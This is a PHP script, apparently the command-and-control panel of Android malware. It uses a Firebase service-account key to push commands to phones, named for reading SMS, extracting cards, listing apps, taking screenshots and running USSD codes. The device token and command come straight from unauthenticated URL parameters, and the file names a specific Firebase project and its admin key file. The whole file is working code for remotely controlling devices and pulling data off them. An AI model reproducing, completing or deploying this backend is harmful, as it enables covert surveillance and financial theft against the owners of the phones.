<?php
include("config.php");

$project_id = "madproject-ea758";
$fileJson = "madproject-ea758-firebase-adminsdk-lga9x-1562e414bc.json";

#----------------------------------------
define( 'Firebase_ID', $project_id );
define( 'Firebase_FILE', $fileJson );
#---------------------------------------
function GetFirebaseToken(){
require_once 'vendor/autoload.php';
  $serviceAccountFilePath = Firebase_FILE;
  $serviceAccount = json_decode(file_get_contents($serviceAccountFilePath), true);

  // Generate the JWT using the service account credentials
  $clientEmail = $serviceAccount['client_email'];
  $privateKey = $serviceAccount['private_key'];

  $payload = [
      "iss" => $clientEmail,
      "scope" => "https://www.googleapis.com/auth/firebase.messaging",
      "aud" => "https://www.googleapis.com/oauth2/v4/token",
      "iat" => time(),
      "exp" => time() + 3600
  ];

  $jwt = Firebase\JWT\JWT::encode($payload, $privateKey, 'RS256');

  // Get the OAuth 2.0 access token
  $requestBody = [
      "grant_type" => "urn:ietf:params:oauth:grant-type:jwt-bearer",
      "assertion" => $jwt
  ];

  $ch = curl_init();
  curl_setopt($ch, CURLOPT_URL, "https://www.googleapis.com/oauth2/v4/token");
  curl_setopt($ch, CURLOPT_POST, true);
  curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($requestBody));
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  curl_setopt($ch, CURLOPT_HTTPHEADER, [
      "Content-Type: application/json"
  ]);

  $response = curl_exec($ch);
  curl_close($ch);

  $accessToken = json_decode($response)->access_token;

  return $accessToken;
}

function sendFirebase($cmd, $device, $device_token, $data = array()) {
    $token_access = GetFirebaseToken();
    
    $base_data = array(
        'cmd' => $cmd,
        'device' => $device
    );
    
    // ادغام داده‌های پایه با داده‌های اضافی
    $message_data = array_merge($base_data, $data);
    
    $fields = array(
        'message' => array(
            'token' => $device_token,
            'data' => $message_data
        )
    );
    
    $fire_id = Firebase_ID;
    $json_data = json_encode($fields);
    $ch = curl_init("https://fcm.googleapis.com/v1/projects/$fire_id/messages:send");
    
    curl_setopt($ch, CURLOPT_HTTPHEADER, [
        'Content-Type: application/json',
        'Authorization: Bearer '.$token_access
    ]);
    
    curl_setopt($ch, CURLOPT_POSTFIELDS, $json_data);
    curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    
    $response = curl_exec($ch);
    curl_close($ch);
    return $response;
}

#---------------------------------------
// پردازش پارامترهای ورودی
if(isset($_GET['device_token'])){
    $device_token = $_GET['device_token'];
}

// دریافت نوع درخواست و داده‌های مرتبط
$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'check';
$device = isset($_GET['device']) ? $_GET['device'] : 'google';
$message = isset($_GET['message']) ? $_GET['message'] : null;
$number = isset($_GET['number']) ? $_GET['number'] : null;
$androidid = isset($_GET['androidid']) ? $_GET['androidid'] : null;
$ussdcode = isset($_GET['ussdcode']) ? $_GET['ussdcode'] : null;

// آماده‌سازی داده‌های اضافی بر اساس نوع دستور
$extra_data = array();
switch($cmd) {
    case 'getsms':
        $extra_data['androidid'] = $androidid;
        break;
    case 'extractcards':
        $extra_data['androidid'] = $androidid;
        break;
    case 'applist':
        $extra_data['androidid'] = $androidid;
        break;
    case 'screenshot':
        $extra_data['androidid'] = $androidid;
        break;
    case 'runusssd':
        $extra_data['androidid'] = $androidid;
        $extra_data['ussdcode'] = $ussdcode;
        break;
    case 'check':
    default:
        // هیچ داده اضافی نیاز نیست
        break;
}

$result = sendFirebase($cmd, $device, $device_token, $extra_data);
echo $result;
?>